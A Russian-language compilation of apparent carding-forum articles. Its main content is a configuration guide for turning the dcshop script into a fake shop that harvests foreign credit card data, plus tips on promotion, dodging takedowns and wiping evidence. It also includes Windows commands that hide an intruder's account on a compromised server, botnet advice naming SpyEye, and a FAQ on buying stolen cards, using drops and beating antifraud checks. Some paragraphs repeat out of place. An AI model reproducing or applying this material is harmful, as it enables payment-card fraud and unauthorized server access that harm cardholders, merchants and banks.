Хотя dcshop для хранения не использует БД (пишет в отдельные файлы), он как раз подойдет, так как не каждый халявный хостинг предоставляет доступ к БД (но бывают приятные исключения, например, https://www.tera-byte.com).

Доставка и установка

Движок состоит из трех скриптов: магазин с поддержкой корзины, админ-зона и сценарий для запроса инфы о кредитной карте. К каждому скрипту есть свой конфигурационный файл.

Сперва настрой конфиг .setup, в нем необходимо изменить несколько значений переменных и пути к директориям. Главной переменной в конфиге является $cgidir, она указывает на директорию cgi-bin, в которой будет располагаться большинство скриптов движка. Лучше всего создать подпапку в каталоге со скриптами и определить в ней сценарии магазина. К примеру, значение $cgidir может быть "/home/carder/web/cgi-bin/eshop".

Далее идут пути, которые зависят от $cgidir. Лучше их не менять, чтобы не было путаницы при закачивании файлов на сервер. Следующая за ними переменная $order_database ведет к самому интересному файлу, ради которого мы и устанавливаем проект dcshop. Это база кредитных карт, точнее, в этот документ будет сваливаться вся информация о буржуйских кредах. Дефолтовое значение переменной - "orders.txt", и находится этот файл по пути, прописанному в переменной $order_dir. Рекомендую менять пути на более сложные, иначе база будет доступна через веб.

Переменная $templatefile отвечает за главный html-файл, который будет подгружаться после исполнения скрипта dcshop.cgi. В этот файл ты можешь поставить свой копирайт, либо убедить буржуя в законности твоей коммерческой деятельности ;).

Затем укажи путь к бинарнику sendmail. Обычно он располагается в директории /usr/sbin, в противном случае местоположение будет оговорено администрацией хостинга. Переменная задается для того, чтобы после успешного заказа клиент получил письмо о принятии платежа. Заодно поменяй адрес smtp-сервера, мыло, с которого будет отправлено письмо, а также его тему (например, smtp.spaceports.com).

В следующей секции конфига задаются абсолютные пути к сайту. Допустим, тебе дали домен shop.hosting.net. Исходя из этого, поменяй переменные $cgiurl и $mainurl на значения к директориям с html и cgi-bin соответственно.

Там же укажи путь к картинкам (они будут располагаться в директории для html-файлов).

Проект подразумевает наличие https-сервера, но я сильно сомневаюсь, что фриварный хостинг предлагает https. Если твой - не исключение из правил, то значения $secureurl и $secureimgurl делай равными $cgiurl и $mainurl. В конце секции укажи e-mail администратора проекта.

На этом, собственно, дефолтовая настройка заканчивается. Дополнительно можно (настоятельно советую) переопределить пути к дефолтовым скриптам. Тогда в случае обнаружения баги в проекте dcshop, твой ресурс не взломают (не зная новые пути). Итак, меняй значения $dcscript, $checkout_script и $adminscript. Открой скрипт dcshop.cgi и измени путь к конфигу в строке require. И переименуй конфиг. Если возникнут проблемы, про это есть и в FAQ’е проекта, и в файле readme.

Оттачиваем остальные скрипты

Помимо главного конфига, есть setup-файлы для скриптов checkout и admin. В конфиге для checkout измени дефолтовые темплейты html на что-нибудь более красивое (лично мне не понравилось слово "demo" в тексте). А в dcshop_admin.setup тебе придется поменять путь к директории, в которой хранится пароль администратора. Рекомендую закрыть доступ к директории с указанным файлом (для чего и нужна поддержка собственных .htaccess-файлов), потому что знающий чел сможет увидеть содержимое каталога, а следовательно, и файла с паролем.

Правильная транспортировка

Настало время для переноса файлов на FTP-сервер. Сперва создай директорию для html-файлов, а также вложенный каталог Images (обрати внимание на регистр). Затем перелей все дефолтовые изображения в эту папку. Зайди в cgi-bin/eshop, в эту директорию залей все конфиги и скрипты. Нюанс - заливать надо в ASCII-режиме, иначе скрипты не будут работать. Осталась самая малость - поставь на все каталоги права 777, а на файлы .pl и .cgi - 755.

Самое время затестить результат. Обратись к главному скрипту магазина dcshop.cgi. Если все верно, то магазин будет функционировать без всяких побочных выкидонов. Если выдаст ошибку 500, узнай причину, по которой сценарий не работает. Для этого создай файл .htaccess в корне WWW со следующим содержанием:

Code:
<Directory "/path/to/www">

ErrorLog "/path/to/www/error.log"

</Directory>

После этого еще раз обратись к скрипту и читай содержимое лога в html-директории. Возможно, ты просто забыл залить какой-нибудь файл либо изменить дефолтовый путь.

Теперь займись админским скриптом. Чтобы никто тебя не поимел либо не спер большую базу новых кредиток, зайди в админ-зону и зарегистрируйся под новым юзером с правами администратора. После этого топай по линку "Change Configuration Setting" и запрети регистрацию новых юзеров. Рули на здоровье своим онлайн-магазином.

Имеет смысл создать отдельную директорию для админ-зоны и закрыть ее дополнительной авторизацией (от греха подальше). Это легко делается с помощью стандартных средств Apache. Вначале необходимо создать .htaccess файл в каталоге с админ-скриптом. В нем пиши следующее:

Code:
AuthType Basic

AuthName "Admin zone"

AuthUserFile "/path/to/.htpasswd"

Require valid-user

Затем создай .htpasswd, в котором записывается аккаунт в виде пары login:password. Допустимые алгоритмы шифрования пароля: DES, MD5, SHA, а также Plain text. Кодировать пароли умеет утилита htpasswd, входящая в поставку Apache. Алгоритм MD5 поддерживается всеми версиями web-сервера и наиболее надежный. Ставится пароль командой htpasswd -bcm .htpasswd admin myp4ssw0rd, опция -bcm означает запись MD5-пароля в новый .htpasswd.

Права на .htaccess и .htpasswd установи равными 600. Это позволит только тебе изменять их, у других бродяг не будет доступа к этим важным файлам.

Строим бизнес

Теперь необходимо изменить дефолтовые товары. Если с фантазией у тебя все в порядке, ты запросто придумаешь товары, которые захотят купить богатые и тупые иностранцы. Но прежде необходимо разобраться со структурой базы товаров.

В файле с товаром (неважно каким) можно задать несколько параметров. Это идентификатор (ID), категория (Category), название продукта (Name), изображение (Image), описание(Description), цена (Price) и налог с продаж (Taxable). Дополнительно есть свои опциональные параметры, например, цвет и стиль. О них читай в файле readme.txt. Забиваешь данные, а они автоматом помещаются в папку Data относительно каталога cgi-bin/.

В этом же каталоге хранится установочный скрипт с краткой информацией о данной категории товаров. Удобно, что движок включает четыре готовых образца. Таким образом, просто сделай аналогичный темплейт для категории товара и вперед.

База все-таки лучше

Написать свой движок с поддержкой БД не так уж и сложно. Необходимо знать принципы обмена между клиентом (скриптом проекта) и сервером (БД mySQL), к которому у тебя будет доступ. При этом не обязательно писать отдельный движок, достаточно внести некоторые изменения в код dcshop и научить его обращаться с БД.

С помощью специального модуля DBI.pm можно работать с mySQL (именно такая БД рулит на большинстве хостингов). Тебе потребуются три вещи: умение коннектиться к базе, вставлять и изменять в ней данные, а также считывать инфу из нужных таблиц в БД. Чтобы переделать файловый движок, необходимо всего лишь заменить обращение к файлу запросом к базе. Фрагменты кода, реализующие грамотную работу с mySQL (код снабжен подробными комментариями), скачивай по адресу.

Закон есть закон

Когда-нибудь твой ресурс будет закрыт. Это произойдет, скорее всего, после того, как в службу поддержки хостинга поступит жалоба от очередного надутого клиента. Поэтому тебе не помешают несколько полезных советов, чтобы последствия закрытия проекта не отразились на твоем здоровье:

1. При организации мини-порногаллереи никто не будет требовать с тебя какой-либо ответственности, если ты сделаешь стартовую страницу с предупреждением о совершеннолетии клиента.

2. Если дела пошли в гору, зарегистрируй себе домен второго уровня и заведи нормального хостера. Когда твой ресурс удалят, ты можешь легко изменить dns-зоны своего домена при переезде на другой хостинг.

3. Постарайся оставлять как можно меньше данных о себе на страницах ресурса. Лучше скажи, что ты какой-нибудь богатый китаец, продающий ручки Паркер, чем бедный русский студент ;).

4. При переезде тебе придется столкнуться с такой проблемой, как бэкап всех данных. Это необходимо сделать вовремя, когда почувствуешь, что дело пахнет керосином. Если с файлами проблем не возникает, умело забэкапить базу - дело тонкое (хотя и несложное). Для этого потребуется помощь небольшой утилиты mysqldump, которая входит в поставку mysqlclient. Заходишь на шелл своего хостинга и набираешь команду:

Code:
$ mysqldump -u client -pclientpassword eshop > eshop.sql

Соответственно, аккаунт к базе должен иметь вид client:clientpassword, а база называться eshop. Бинарник сформирует структуру таблицы, которая должна быть заархивирована и транспортирована на другой хостинг. Сжимать лучше архиватором bzip:

Code:
$ tar jcf eshop.tar.bz2 eshop.sql

На новом хостинге необходимо его распаковать и создать копию структуры базы (по файлу eshop.sql). При этом не нужно заботиться о создании таблиц и БД, все сделает mysqldump:

Code:
$ tar jxf eshop.tar.bz2

$ mysql -u client -pclientpassword < eshop.sql

С помощью переопределения ввода ты позволяешь бинарнику mysql получить команды прямо из файла. В нашем случае из бэкапа eshop.sql.

5. Чтобы выйти сухим из воды, удали все файлы со старого хостинга (разумеется, после бэкапа) и дропни базу данных. Это можно сделать командой "drop database eshop;" в клиенте mysql.

Теперь ты кардер

Вот и все. Псевдобизнес - очень прибыльное дело, потому что все заработанные кредитки уходят только тебе. В день такой ресурс могут посетить десятки, а то и сотни богатых буржуев (зависит от раскрутки). Но в организации подобных проектов существует определенная доля риска, иначе все понаделали бы онлайн-магазинов и жили за счет буржуев. Поэтому, если ты прилично зарабатываешь, и решил создать псевдосайт только из любопытства, поразмысли на досуге, стоит ли тебе тратить свои нервы и деньги на противозаконную деятельность...

Раскрутка ресурса

Сделать псевдосайт - полдела, необходимо его еще и раскрутить. В противном случае твой ресурс запылится и не принесет никакой пользы. Для привлечения посетителей, конечно, все средства хороши, но не все эффективны. По-хорошему, если ты планируешь заколачивать на ресурсе приличные бабки, придется сначала потратиться на раскрутку.

Прежде всего, учитывай, что твоя основная аудитория - иностранцы. Следовательно, реклама рассчитана на них. Скорее всего, сам ресурс придется сделать на английском языке, либо на русском и английском одновременно. Далее регистрируешь ресурс на поисковых серверах, при этом тебя интересуют как наши поисковики, так и забугорные. Никогда не заморачивайся с поиском полного списка поисковых серверов, достаточно знать один крупный (к примеру, www.yandex.ru), а остальные находишь непосредственно через него.

Часто эффективно проходит фокус с перенаправлением трафика с других порноресурсов. То есть создается порносервер, раскручивается в одиночку, а потом при помощи этого сервера раскручивают любые другие. Как именно это сделать - дело техники: перенаправлять часть заходов, подгружать параллельно или использовать ссылки-ловушки. При этом на раскручиваемом ресурсе ставятся счетчики рейтинговых систем, и он взлетает до небес. А там уже как лавина. Далее раскрученный ресурс, в свою очередь, можно использовать для раскрутки последующего.

Некоторые умельцы специально заводят ресурсы, чтобы предлагать другим раскрутку за деньги. Ты же можешь найти подобные ресурсы на условиях взаимораскрутки. То есть на первых порах они раскручивают тебя, а в будущем вы будете обмениваться трафиком, взаимно увеличивая количество реальных посещений на своих сайтах.

Другой эффективный способ привлечения потенциальных покупателей на свой псевдоресурс - баннерная реклама. При этом не обязательно выставлять код баннерной системы, можно выкупить показы на вторичном рынке, что порой очень выгодно. Вторичный рынок баннерных показов - по сути трафикогенерящие ресурсы, зарегистрированные в баннерных сетях. Часть показов они тратят на собственную раскрутку, а часть продают на так называемом вторичном рынке баннерных показов. Есть еще вариант продавать показы непосредственно баннерной сети, но цены будут ниже, плюс не все баннерные сети выкупают свои показы, либо выкупают только на определенных (чаще всего невыгодных) условиях.

Для покупки баннерных показов на вторичном рынке тебе понадобится баннерная биржа, на которой ты сможешь определиться с ценами (средние по бирже) на те или иные баннерные сети и форматы баннеров, плюс выкупить необходимые показы, если они есть в наличии. Одна из популярных баннерных бирж.. Там тебе и FAQ, и статистика по наиболее популярным (читай - пользующимся спросом) баннерным сетям и форматам, а когда-нибудь ты сможешь и сам продавать через нее баннерные показы другим начинающим ресурсам :).

Хороший хостинг
  • www.webservis.ru - PHP/CGI, баннер хостера обязателен
  • www.fatal.ru - PHP/CGI
  • www.dot.tk - PHP/CGI, бесплатный домен второго уровня в зоне .tk
Бесплатный движок

При серьезном подходе к делу, псевдосайт может приносить кардеру умопомрачительные доходы.

Чтобы построить псевдосайт, необходимо найти для него программное обеспечение - движок. Он состоит из отдельных html-страниц (формы для оплаты) и скриптов, которые обрабатывают вводимую информацию.

На фриварных источниках валяется неплохой движок dcshop. Он организовывает универсальный интернет-магазин по продаже всякого хлама.

Рекомендую закрыть доступ к директории с указанным файлом (для чего и нужна поддержка собственных .htaccess-файлов), потому что знающий чел сможет увидеть содержимое каталога, а следовательно, и файла с паролем.

Нюанс - заливать надо в ASCII-режиме, иначе скрипты не будут работать. Осталась самая малость - поставь на все каталоги права 777, а на файлы .pl и .cgi - 755.

Затем создай .htpasswd, в котором записывается аккаунт в виде пары login:password. Допустимые алгоритмы шифрования пароля: DES, MD5, SHA, а также Plain text. Кодировать пароли умеет утилита htpasswd, входящая в поставку Apache.

При переезде тебе придется столкнуться с такой проблемой, как бэкап всех данных. Это необходимо сделать вовремя, когда почувствуешь, что дело пахнет керосином.

Если ты прилично зарабатываешь, и решил создать псевдосайт только из любопытства, поразмысли на досуге, стоит ли тебе тратить свои нервы и деньги на противозаконную деятельность.


1. Автоматически находить множество прокси

Для этого есть такая прога называется Proxy Switcher! Выполняет полностью все функции заявленные космосом.

2. Сканировать интернет на наличие скрытых прокси

Эту же функцию выполняет эта же прога Proxy Switcher!

3. Находить на дедиках ценные материалы, и суметь защищать свои

Для этого есть програмка которая находит слова в тексте ! (например ищите СС? Вводите на дедике слово связанное с СС например CVV и если на дедике есть прога найдет!)

Описание программы Folder Find Text и ещё один софт называется Everything - Программа для поиска файлов тут видео


4. Уметь быть скрытным на дедике от администратора

Во первых надо чистить дедик после каждого входа и выхода... во вторых надо иметь Админку на дедике... дабы тебя от туда не выкинули)) в третьих надо спрятать свой профиль на дедике) как это сделать?

Для WIN дедика заходишь в командную строку (cmd.exe) и пишешь:

Убрать учетку из меню выбора пользователей:

PHP код:

Code:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v пользователь /t REG_DWORD /d "00000000" /f

Еще разумно скрыть папку с файлами на учетке:

Code:
attrib +h +s "C:\Documents and Settings\пользователь"

где "пользователь" - имя твоей учетки (например, user).

5. Нескольким видам получения дедиков
  • Приватный словарь, который собран из 30 млн SQL записей
  • Технология получения доступа с использованием минимума ресурсов компьютера
ответ на все эти вопросы вы найдете тут )

6. Получать роутеры с минимальными потерями траффика

Тут я бессилен т. к. я кардер и с трафиком такого рода дел не имел... да и мне не нужно...

7.Получать уязвимые сайты и превращать их в прокси с шифрованием

На этот вопрос отвечает все таже прога proxy switcher

Вставляешь ссылку она сканит прокси и скосы... а вообще ребят на заметку прокси далеко уже не в теме и стоят они всего 1$ максимальная цена за хороший прокси... имхо ДОХНУТ они быстро!

8. Быстро создавать ботнет

создать быстро ботнет это легко... т. к. версий в паблике просто полно разных ддосеров а также вирей я бы посоветовал бы spyeye.

СРАЗУ СКАЖУ ЧТО АНТИВИРЬ БУДЕТ РУГАТЬСЯ ))! но самое главное что для ботнета нужен Трафик сплойты либо инжекции которые стоят как минимум от 500$ и выше... а также загрузки которые стоят примерно также )) но опять же ботнет можно иметь для разных целей )

9. Защищать свой дедик и компьютер от взлома

О дедиках мы уже говорили )) а теперь о компьютере ) есть такая веселая программка TureCrypt) также в мануале о шифровании есть статьи про эту прогу!

10. Создать свой прокси сервис, или выгодно продать свою базу селлерам прокси и дедиков

Как я уже и говорил прокси быстро дохнут и жить им от 20 минут до 12 часов) а дедике это определенная тема... как я уже писал выше )

Тут есть не только софт как достать дедики но и свой собственный онлайн шоп по дедикам! Таким образам вы можете добывать дедике раскрутить свой шоп и продавать дедики ОНЛАЙН!

Механизм работы платежных систем

Кредитная карта, в первую очередь, является внешней частью твоего банковского счета. Работу кредитной системы обеспечивают: платежная система, банки, производители; простая покупка по кредитке представляет собой довольно сложный механизм. Об этом и многом другом я сегодня расскажу.

Механизм оплаты

Почти любая финансовая операции при использовании кредитки начинается с авторизации. Во время этого этапа необходимо определить, есть ли у тебя на счете необходимые средства и можешь ли ты ими воспользоваться. Авторизация может проводиться любым доступным способом. Решение об авторизации может принять сама карта (в случае карты с микросхемой) – это метод называется off-line, т.е. связываться ни с кем не надо. В противном случае необходимо запросить подтверждение у банка: запрос отправляется в первую очередь эквайреру (в процессинговый центр), затем пересылается эмитенту, который принимает решение, ответ перенаправляется снова эквайреру и только потом возвращается на место запроса (такой метод называется on-line). Это процесс может проходить через сеть, или продавец может просто спросить – голосом или по факсу.

Если авторизация подтверждена, то дальше ты можешь в полной мере распоряжаться зарезервированной суммой. Если ответ на запрос не пришел, то – извини. И это еще не худший вариант - в ответ может прийти приказ продавцу изъять у тебя карту (например, если они числится потерянной или украденной). Поэтому авторизация является ключевым этапом сделки. В редких случаях авторизации может и не быть, подробнее об этом ниже.

Сумма, на которую запрашивалась авторизация, на твоем счету замораживается, даже если ты вдруг передумаешь делать покупку. По завершении авторизации и через небольшой промежуток времени банк приступает к переводу средств на счет продавца. То есть - ты уже ушел из магазина, забрав покупки, а продавец все еще ждет свои деньги. Для начала эмитент отправляет запрос на перевод зарезервированных средств расчетному банку, который доставит их счет эквайрера, который уже, в свою очередь, перенаправит их туда, где ты совершил покупку. За перевод средств эквайрер оставит себе небольшой процент от суммы, за срочность процент будет больше. В общей сложности продавцу придется ждать денег от нескольких часов до нескольких дней. За это многие магазины не любят обслуживать креды.

Вся совокупность финансовых операций по кредам от начала до конца называется взаимообменом (или interchange).

Что нам может дать банк

С банковской точки зрения креды можно разделить на три основных класса. Это важно, так как этим определяется, каким образом ты сможешь распоряжаться своими деньгами или брать в кредит.

1. Дебетовые (расчетные) карты – ты можешь использовать только те средства, которые досрочно положил на свой счет. Такую креду получить проще всего, и стоит она дешевле остальных (иногда их даже выдают бесплатно). Никакой кредит или перерасход средств по расчетной карте не предусмотрен. Кстати, дебетовые карты являются самыми распространенными.

2. Кредитные карты – служат для получения определенного (заранее оговоренного) кредита под определенный процент на определенный срок. К сожалению, процент довольно велик – от 10 до 40% годовых для России. На счет карты деньги вносить не нужно. Соответственно, чем больший кредит дается по карте, тем ее сложнее получить и тем она элитнее (сумма кредита может доходить до нескольких десятков тысяч баксов). Для заключения контракта необходимо, помимо основных документов, представить справку о твоих ежемесячных доходах.

3. Овердрафтные карты (почти то же самое, что кредитно-дебетовая карта) – расчетные карты с кредитным лимитом. Можно класть деньги на счет и выполнять определенный перерасход. Кредит дается обычно на срок от одного до трех месяцев, но чем дольше у тебя остается долг, тем больший ты должен будешь выплатить процент. ИМХО, такие карты самые удобные.

По привычке и дебетовые, и овердрафтные, и кредитные карты называют просто кредитными (кредитками/кредами), что, как видишь, не совсем верно.

Кстати, самую первую свою кредитку можно приобрести уже с 14 лет.

В принципе, продавцу/банкомату абсолютно неважно, по какой карте ты расплачиваешься (твои это средства или кредит), они даже не знают, сколько денег у тебя на счету. Но в некоторых местах дебетовые креды не принимают, в отличие от кредитных или кредитно-дебетовых (в чем одно из их преимуществ).

Кстати, по кредитным или овердрафтным картам очень часто кидают банк. Порой банку практически невозможно законно вернуть себе весь кредит даже через суд, если клиент отказывается возвращать деньги (тут, по решению суда, они могут только вычитать некоторый процент из официальной (!) зарплаты должника). Поэтому в России долгое время рядовым клиентам предоставлялись исключительно дебетовые карты (даже если карта была кредитной по определению). Лишь в последние несколько лет стало реальным купить полноценную кредитную карту.

Еще очень важную роль играет такой показатель, как лимит суммы, на которую ты можешь совершить покупку без авторизации (наличие средств на креде не проверяется, а банку-эмитенту просто направляется платежное поручение на данную сумму). К сожалению, такая сумма сравнительно мала (около $50). Вот еще один из способов обуть банк, можно даже по пустой или левой креде. Хотя, по большому счету, банку твои 50 баксов как капля в море (сильно ты их не расстроишь). В России такая система мало распространена, а жаль.

Платежные системы

Всевозможных платежных систем в мире несчетное количество - в каждой стране своя и чаще всего не одна, есть также и международные системы. Кстати, к платежным системам относятся не только банковские, но еще и системы путешествий и развлечений – так называемыеT&E (Travel & Entertainment), например, American Express и Dinners Club. Из международных систем выделяются всего несколько крупнейших: Visa, Eurocard/MasterCard, American Express (AmEx) & Dinners Club International (DCI). Также можно отметить самые масштабные системы в России: Union Card, STB и Золотая корона (правда, преимущества этих систем очень сомнительны из-за их малой распространенности). Кстати, в России, в отличие от других стран, для того, чтобы стать эмитентом, необходима специальная лицензия Центробанка.

Бесспорно, самая популярная система в мире – Visa. Эта система применяется примерно в 20000 банках в 72 странах мира, про количество пользователей говорить не имеет смысла - с каждым днем их число неуклонно растет.

Вторая по величине система Europay International. Она объединяет в себе сразу две крупных подсистемы: Eurocard/MasterCard и Cirrus/Maestro.

Теперь немного про составляющие платежной системы. За функционирование системы отвечают несколько участников (точнее, видов участников). Это эмитенты, эквайеры и расчетные банки. Каждый из участников должен четко выполнять свои функции. Эквайрер – банк, который обслуживает все необходимые финансовые сделки по кредам. Эмитент – сама организация, которая выпустила креду. Расчетные банки играют роль регуляторов между всеми участниками сделки (следят за переводом денежных средств и прочее). Нужно отметить, что за это отвечают не обязательно разные банки – все эти функции может выполнять один-единственный банк.

Классы карт

Каждая платежная система выпускает несколько видов кред, чтобы любой смог выбрать кредитку, нужную именно ему. Класс карты определяет почти все ее характеристики (остальные определяет банк). Обычно выпускаются креды электронного (для банкоматов и терминалов), экономичного, стандартного и элитного класса. Чем дороже карта, тем больше у нее преимуществ: большой лимит кредита, принимается в большем количестве мест, ты получаешь множество всяких скидок, подарков и прочего, плюс, конечно, великолепный сервис.

Visa предлагает на выбор кредитки Electron, Classic, Gold, Platinum и несколько других, более редких. Я расположил креды в порядке их стоимости. За годовое обслуживание Visa Electron берут примерно 5 баксов, за Classic – 25, а за Gold – все 100. Visa Electron предназначена только для использования в банкоматах и электронных терминалах в магазинах. Classic и Gold – кредитки класса повыше, но для их использования необходимо, чтобы баланс твоего счета не опускался ниже определенной суммы: обычно $100 для Classic и $1000 для Gold (хотя иногда такое ограничение банками опускается). Различие между Classic и Gold довольно незначительно, отличаются они в основном большим количеством дополнительных фишек у последней. Это были дебетовые карточки. Visa Platinum – это уже овердрафтная карта. Стоит эта карта соответственно названию, и получить ее тяжело. Но за это ты получаешь кредитный лимит в $20000 и просто немыслимое количество всяких страховок, скидок и прочего и прочего.

В системе Eurocard/MasterCard применяются аналогичные креды: Cirrus/Maestro, Mass, Gold. Все характеристики примерно те же, что и у Visa.

Электронные карты

Ни для кого не секрет, что по кредиткам можно расплачиваться и в инете. Все бы хорошо, но тут возникает большая проблема безопасности. Для оплаты покупки непосредственно в интернет-магазине приходится сообщать свои идентификационные данные, после этого их конфиденциальность оказывается под угрозой. Для того чтобы обезопасить все финансовые операции через Сеть, созданы специальные платежные подсистемы. Таких систем в инете очень много, пожалуй, самая известная в России – WebMoney, но она не ориентируется на работу с кредитками, поэтому WebMoney я рассматривать не буду. Прочие популярные системы: CyberPlat, ASSIST, PayCash, RBS и ЭлИТ. Принцип функционирования этих систем примерно одинаков – они являются посредниками между тобой, банком и интернет-магазином. Конечно, за свои услуги они оставляют себе некоторый процент от суммы сделки, но зато гарантируют сохранность твоих средств и конфиденциальность данных. Почти все эти системы обеспечивают работу с картами международных платежных систем Visa, Eurocard/Mastercard, American Express и Dinners Club, а также иногда обслуживают и креды российских платежных систем.

Безопасность сделки может обеспечиваться следующими способами: инет-магазин не получает твоих идентификационный сведений (они хранятся только у платежной подсистемы); канал передачи данных защищается при помощи SSL; используется цифровая подпись; гарантируется юридическая чистота обеих сторон; используются особые сертификаты SET; полная выписка счета обо всех проведенных финансовых операциях. Такая схема удобна и продавцам, и покупателям, которым не жалко отдать какую-то сумму за безопасность. Есть у таких систем и свои минусы: например, можно работать только с магазином, зарегистрированным в данной сети. Также иногда для работы необходимо поставить фирменную программу.

Итого

Вот, собственно, и все, что я хотел рассказать про роль и функции кредиток в финансовой системе. На тему кредиток пишут диссертации, создают целые порталы в Сети, пишут огромные документации. Сам понимаешь, весь этот материал просто невозможно было охватить, но я постарался описать все самое существенное и примечательное.

Словарь
  • Аверс – лицевая сторона кредитки
  • Импринтер – девайс у продавца, делающий отпечаток эмбоссированных данных на чек
  • Картридер – устройство для чтения данных с карты
  • Расчетный банк – банк, регулирующий финансовые операции между участниками сделки
  • Реверс – оборотная сторона креды
  • Типпинг – процесс оттиска эмбоссированных данных на чек
  • Эквайрер – банк, входящий в платежную систему и обслуживающий все финансовые операции по кредам
  • Эмбоссинг – процесс выдавливания (тиснение) текста на поверхности кредитки, таким образом выдавливают номер креды/дату окончания ее действия/кард-холдерс-нейм и прочее (отсюда название карт - эмбоссированные)
  • Эмитент – организация, выпустившая карточку
Сумма, на которую запрашивалась авторизация, на твоем счету замораживается, даже если ты вдруг передумаешь делать покупку. По завершении авторизации и через небольшой промежуток времени банк приступает к переводу средств на счет продавца.

Для заключения контракта необходимо, помимо основных документов, представить справку о твоих ежемесячных доходах.

Безопасность сделки может обеспечиваться следующими способами: инет-магазин не получает твоих идентификационный сведений (они хранятся только у платежной подсистемы); канал передачи данных защищается при помощи SSL.


Q: Что такое креды, CC, картон и где их достать?

A: Это и есть кредитные карты, именно благодаря им существуем мы.

Способов достать CC много - от банальной кражи до взлома интернет магазина, но на данном этапе я бы посоветовал вам незаморачиваться и просто купить их у известных людей на данном форуме.

Q: Я новичок в кардинге. В какой теме лучше начать работать?

A: Если вообще ноль в кардинге, то мой тебе совет начинать с вбива, для того чтобы хоть немного получить представление о кардинге. Прочти все статьи в этом разделе - это поможет тебе составить хоть какое-то представление о нашем деле.

Настрой машину для вбива, обеспечь себе безопасность и ищи работодателя.

Q: Кто такой вбивальшик?

A: Это человек который занимается вбивом информации по кредитной карте в какой нибудь магазин, от него во много зависит удачный исход всей операции. Подробнее о том что это такое вы можете узнать здесь.

Q: Примерно сколько получает вбивальщик за свою работу?

A: Ну это все зависит от того как вы договоритесь со своим работодателем, чей будет расходный материал (карты, прокси и т.д.) и какова сложность работы. В среднем за вбив платят от $2 до $5.

Q: Что такое эмитент?

A: Это банк который выпустил саму кредитную карту, узнать название банка который эмитировал карту можно с помощью программы CC2Bank

Q: Что такое бин?

A: Бин это первые 4 или 6 символов в номере кредитной карты, именно по нему и узнают что за банк эмитирует кредитную карту, а также тип карты.

Q: Что такое CVV/CVV2 код?

A: Это 3-4 дополнительные цифры, призванные улучшить защиту кредитных карт, в данный момент очень тяжело найти места где бы принимали карты без CVV.

Q: Как выглядит информация по кредитной карте?

A: Подробнее об этом вы можете узнать здесь

Q: Что такое карты с Full Info и зачем они нужны?

A: Это информация по кредитной карте включающая в себя по мимо стандартных данных еще и SSN, DOB, PIN, MMN и т.д. Такая информация нужна в тех случаях когда требуются более полные данные по держателю карты (например при энроле) или обнале.

DOB - Date of birth

SSN - Social Security Number

MMN - Mothers Maiden Name

Некоторые фулки включают в себя PIN => они же дампы.

Для обнала такой карты тебе нужны след. данные cc# ,exp, PIN,определённый бин по которому налят (т.е. если у карты нет track2,чтобы генераторщик смог пробить его по определённым бинам) и естественно опытный нальщик.

Q: Кто такой дроп?

A: Это человек принимающий на своё имя какой либо скарженый тобой товар, после чего он пересылает его тебе или другому дропу (вообще тут бывают разные варианты). Чаще всего дропы не знают что они принимают украденные вещи и рано или поздно за ними придут копы.

Q: Я снял с карты около $50-$100 станут ли меня искать за эти деньги?

A: По идеи конечно вас должны будут искать, но на практике это бессмысленно, т.к. ваши поиски выльются в более крупные суммы.

Q: Что такое PayPal или палка?

A: Очень популярна онлайновая система оплаты различных услуг в USA, имеется возможность пополнения аккаунта с помощью кредитной карты.

Q: Вы не могли бы подсказать шопы которые 100% шлют товар?

A: Нет, это информация представляет собой определённую ценность и просто так вам никто не подскажет шоп который 100% шлёт товар.

Q: Что такое tracking number или трэк?

A: После того как ты заказал в шопе товар его высылают на дропа с помощью почты или курьерской службы. Самые известные из этих служб UPS, FedEx, AirBorne и т.д. Так вот после того как товар будет выслан тебе выдаётся этот самый трэк, с помощью которого на сайте курьерской службы ты и можешь узнать где в данный момент находится посылка.

Q: Как мне перевести деньги с кредитной карты на WM?

A: Никаких способов напрямую перевести деньги с кредитной карты на WebMoney не существует.

Q: Что такое фрауд?

A: В переводе с английского "мошенничество", в принципе перевод полностью отображает значение этого термина.

Q: Что такое антифрод и как его обойти?

A: Это система защиты от мошенничества - различные дополнительные проверки.

Как обойти - будь полностью как амер, во всех ипостасях, и будет всё ок.

Иногда проще забить на шоп с сильной системой антифрода, чем пытаться ее обойти.

Credit line - сумма кредита, которую банк дает (доверяет) на траты и покупки сейчас и которую клиент сможет погасить потом.

Current Balance - сколько потратил, столько потом придется возвращать банку.

А из Credit line вычитается

Available Credit - сколько еще можно потратить.

Карта или точнее кредит выдается на год или несколько лет. Поэтому на карте пишется

Expiration date - месяц и год, когда договор с банком закончится. Например 06/2006.

Каждая карта уникальна. Для поддержания этой уникальности на них пишут

Card Number - число, чаще всего 16-ти значное. Реже встречаются 13-ти значные. У American Express по умолчанию 15-ти значное.

Следят и ухаживают за всей этой махиной расчетов по кредитным картам

Visa и Mastercard/Eurocard - международные платежные системы (МПС). У Визы номера карт начинаются на 4, у Мастеркард на 5. Остальные брэнды не так развиты и дальше собственной страны можно сказать не лезут (American Express, Discover, JCB, Золотая Корона и др.)

Бывает, что карты роняют, но не нагибаются за ними, т.к. издали она похожа на кусок мыла, и идут дальше. А поскольку при покупках на большие суммы частенько спрашивают документ, удостоверяющий личность, то для того чтобы внимательные уборщики не могли отовариваться за чужой счет, на лицевой стороне карты пишут

Cardholder's Name - имя и фамилия держателя карты. (Карта - собственность банка. Клиенту она выдается только поносить с собой, т.е. быть этим самым держателем.)

А чтобы обладатели фотографической памяти, увидев все реквизиты карты в руках владельца, не могли потом ничего купить по телефону или в онлайне по чужой карте, на ее обратной стороне пишется

CVC2 или CVV2 - три секретных цифры мелким шрифтом. У Мастеркарда это называется Card Validation Code, у Визы - Card Verification Value.

Чтобы кардхолдер знал сколько он потратил или внес на счет, банк высылает ему

Statement - ежемесячный детализированный отчет обо всех движениях денег на карте, где построчно указаны стоимость кольта, услуг юриста, налога на развлечения и т.д.

Там имеются такие важные для банка и нелюбимые кардхолдерами поля как

Minimum Payment Due - сумма ежемесячного платежа, вычисляемая и пересчитываемая каждый месяц цифра, не менее которой клиент должен вернуть банку за потраченное. Общая сумма долга делится на оставшиеся месяцы до конца договора, накручиваются проценты и все это клиент оплачивает понемножку каждый месяц вместо того чтобы вывалить мешок килобаксов на стол в конце срока. Да и надежней, не сбежит с деньгами и не умрет не вовремя.

Payment Due Date - не позже этого числа каждый месяц кардхолдер и оплачивает свой Minimum Payment Due иначе банк накрутит еще

LATE FEE - посуточный штраф за опоздание платежа.

Из лимитов в стейтменте можно еще увидеть

